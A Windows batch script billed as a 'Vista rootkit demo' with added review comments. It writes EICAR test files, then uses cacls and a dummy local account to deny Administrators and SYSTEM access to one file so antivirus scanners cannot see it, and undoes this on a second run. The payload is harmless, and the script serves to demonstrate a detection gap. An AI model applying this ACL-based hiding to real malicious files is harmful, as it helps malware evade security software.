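@Echo off
rem ====================================================================
rem Vista ACL / anti-virus visibility demo (by Seal, changes by Jabzor).
rem
rem Creates two identical EICAR test files under
rem %systemdrive%\vistarootkit_test\ and strips Administrators/SYSTEM
rem access from one of them, so the effect of file ACLs on an AV
rem scanner can be observed. A second run (marker directory already
rem present) uninstalls everything again.
rem
rem Requires an elevated command prompt: cacls and "net user" need
rem administrative rights. Runs interactively (PAUSE, cacls prompts).
rem ====================================================================
echo ====================================
echo = VISTA ROOTKIT DEMO =
echo = Using Permissions in your Favour =
echo ===========================by Seal==
rem (With Changes suggested by Jabzor)
echo.

rem Abort early when not elevated. Without this check a non-elevated run
rem still created the marker directory (cacls / net user then failed),
rem so the next run jumped straight to :uninstall with nothing to undo.
net session >nul 2>&1
if errorlevel 1 (
    echo This script must be run from an elevated command prompt.
    goto end
)

rem The marker directory decides between install and uninstall.
if exist %systemdrive%\vistarootkit_test\ (goto :uninstall) else mkdir %systemdrive%\vistarootkit_test\

rem Pre-installation warning.
echo WARNING: USE AT YOUR OWN RISK. THE AUTHOR
echo ACCEPTS NO RESPONSIBILITY FOR THE USE OF
echo THIS SCRIPT.
echo.
PAUSE

rem Write the EICAR test string to both files. The ">" redirect creates
rem and truncates the target, so the earlier "copy system.ini" into each
rem file was dead work and has been dropped. "%%" and "^^" are the batch
rem escapes for a literal "%" and "^" in the test string.
echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*> %systemdrive%\vistarootkit_test\infected_file_detectable
echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*> %systemdrive%\vistarootkit_test\infected_file_undetectable

rem Dummy user account. The original created it with no password at all;
rem "*" makes "net user" prompt for one, so no password-less local
rem account is left on the machine for the duration of the demo.
net user viral_account * /ADD
echo Dummy account created...
echo.

rem Re-assign permissions on one file so it is not visible to AV products.
rem NOTE(review): each cacls call below runs without /E, so it replaces
rem the whole ACL instead of adding an entry (that is also why cacls asks
rem for confirmation). The earlier entries are therefore discarded and
rem only the last one remains - confirm this matches the intended ACL.
echo Assigning permissions to dummy account. (Say "Yes")
cacls %systemdrive%\vistarootkit_test\infected_file_undetectable /P viral_account:F
echo.
echo Removing Administrator access. (Say "Yes")
cacls %systemdrive%\vistarootkit_test\infected_file_undetectable /P Administrators:N
echo.
echo Removing SYSTEM access. (Say "Yes")
cacls %systemdrive%\vistarootkit_test\infected_file_undetectable /P SYSTEM:N
echo.
echo Permissions re-assigned...
echo.
echo.
echo Everything is now setup. Two identical files have been placed
echo in your %systemdrive%\vistarootkit_test\ directory. One is detectable by your
echo anti-virus product, the other isn't.
echo.
echo ====================================
echo Installation complete.
goto end

:uninstall
echo Files already detected. Uninstalling.
echo 1. Re-assigning permissions...
cacls %systemdrive%\vistarootkit_test\infected_file_undetectable /P Administrators:F
rem If the ACL could not be restored (e.g. the file is missing), stop
rem here: the del/rmdir below would fail anyway, and the marker directory
rem must stay so the uninstall can simply be re-run. A declined cacls
rem confirmation may not set errorlevel - presumably it is then caught
rem by the failing del instead; confirm on a test box.
if errorlevel 1 (
    echo Could not restore permissions; leaving files and account in place.
    goto end
)
echo.
echo 2. Deleting files...
del %systemdrive%\vistarootkit_test\infected_file_undetectable %systemdrive%\vistarootkit_test\infected_file_detectable
rmdir %systemdrive%\vistarootkit_test\
echo 3. Removing dummy account.
net user viral_account /DEL
echo ====================================
echo Uninstallation complete.

:end
echo.
PAUSE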